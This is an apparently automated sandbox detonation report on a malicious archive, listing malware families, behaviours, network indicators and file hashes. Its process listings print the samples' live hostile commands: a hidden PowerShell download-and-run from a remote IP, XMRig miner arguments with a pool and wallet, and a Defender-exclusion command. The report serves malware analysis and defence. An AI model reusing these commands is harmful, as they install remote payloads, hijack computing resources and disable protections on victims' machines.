Analysis Overview
SHA256
f50137e69eab731be6ac6e16fe5f5ce536d64b8e5d3786f7a68c6b4a7afc3940
Threat Level: Known bad
The file quarantine.rar was found to be: Known bad.
Malicious Activity Summary
Stealc family
Systembc family
xmrig
SystemBC
Litehttp family
Amadey family
Stealc
Xmrig family
Amadey
LiteHTTP
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Identifies Wine through registry keys
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Checks computer location settings
Drops startup file
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Checks BIOS information in registry
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
System Location Discovery: System Language Discovery
Program crash
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 00:51
Signatures
Amadey family
Litehttp family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
147s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3448 set thread context of 3232 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
"C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8131.tmp" "c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 3232"
Network
| Country | Destination | Domain | Proto |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| US | 20.189.173.24:443 | N/A | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2264-2-0x00007FFBF4003000-0x00007FFBF4005000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uswhg4kw.r1n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8d80c45e0e047b75073a3d1c2710c68f |
| SHA1 | babc73cf30327b36d184239a2747ec94d48929f4 |
| SHA256 | 6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64 |
| SHA512 | 5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24 |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline
| MD5 | 807f0a5dfb7b5d0671639060841ddfae |
| SHA1 | 17b188d1a8429273ef0c8425ce65d31e5b88dd27 |
| SHA256 | 56fc36bf83529bd8a78d2965a890e35f309e4948d2de904a7856c3d976371bd4 |
| SHA512 | 2611cbefa22cce53bf494dc361604fec9ade10237a0bcb1cf9013a709b517edd9e230f1a00087e04cc1aa3877fadeb3bb6a9840ebe73ad70c6c553fac6c351c2 |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
\??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP
| MD5 | 021866765f724ce1504a96a6491f3c9b |
| SHA1 | 964643f1f53eac3d8f6e53032182ccd0afba25f9 |
| SHA256 | 907817b4529748d5114146221a9488a3985d098c7aedec565c26d2a5b641cfbc |
| SHA512 | d590b44088ade2521fb3cad1add6bdd55698822dffe24f43b9d4f8b4c593b80f6eac02de716a557dc175e6c5dea5cbb6b04a72cbf5c385636116f6919bc86911 |
C:\Users\Admin\AppData\Local\Temp\RES8131.tmp
| MD5 | 06e81bf18ee9d7d04d1a1bec9bb8d704 |
| SHA1 | 70b92705bad7b26a852cdb05335687254d709cf7 |
| SHA256 | 86b3139a88eb85a774443c88d337e6b6c53ce3b80fac62ba8a725aa3991fca6c |
| SHA512 | f002720416d70032708beafef9f94e52d224f1cbe03eb0b6ceac333283c511f589d4d23eba231a04e6979cc2d9b37ddde96625c7bbc6d77eacb617cac0974ade |
C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.dll
| MD5 | c339446662f8edacaf1ec7c656dbd534 |
| SHA1 | d4f33a03f783ac9e61de9a18c7d1acf06e42a40d |
| SHA256 | dd318d287160f76fec13d425f09cbedbe4f5ef4ac258687fe1253377a56622f7 |
| SHA512 | a61348accdae412676c4e67d68d088cf4a936703ac890ef3fa23fcd7c654807cb12ea75ad5e9cc8b8f3f5edabb1ce904eaae4f0aae34117cb79e525a5de96f33 |
Analysis: behavioral11
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20250207-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\fvoj\ueob.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\ProgramData\fvoj\ueob.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\fvoj\ueob.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\fvoj\ueob.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
| PID 1648 wrote to memory of 2660 | N/A | C:\Windows\system32\taskeng.exe | C:\ProgramData\fvoj\ueob.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
"C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {2BD1E1E6-16F1-43D5-97DE-71485ABFE05B} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]
C:\ProgramData\fvoj\ueob.exe
C:\ProgramData\fvoj\ueob.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
Files
C:\ProgramData\fvoj\ueob.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2660-12-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2660-13-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | dc2bab69606410150c00fa0931960a4e |
| SHA1 | 9a7ae1eda06d87a712fdabde4a7e92bf38e20bae |
| SHA256 | 025457678db09f1c55c3c9a94ad43891fca4b75dd97e03316c4822824e5ee6fc |
| SHA512 | 72516cb393d855ed8e77ba23f46a0a5267ce2a545de9f7c2f52c1d80f30e8ca690fdd0c90deabc46334c2c09a579658d7fe74d15b70b1ab6ea43837b05806bed |
Analysis: behavioral13
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
120s
Max time network
149s
Command Line
Signatures
LiteHTTP
Litehttp family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\fJzVdpCC\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2580 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
"C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\fJzVdpCC\Anubis.exe""
Network
| Country | Destination | Domain | Proto |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Amadey
Amadey family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
| PID 2168 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
"C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
Files
memory/2168-1-0x0000000000210000-0x0000000000211000-memory.dmp
\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
Analysis: behavioral3
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
"C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd.exe
Network
Files
\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\chromium.exe
| MD5 | 0eb68c59eac29b84f81ad6522d396f59 |
| SHA1 | aacfdf3cb1bdd995f63584f31526b11874fc76a5 |
| SHA256 | dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f |
| SHA512 | 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7 |
C:\Users\Admin\AppData\Local\Temp\onefile_2428_133856959024288000\python312.dll
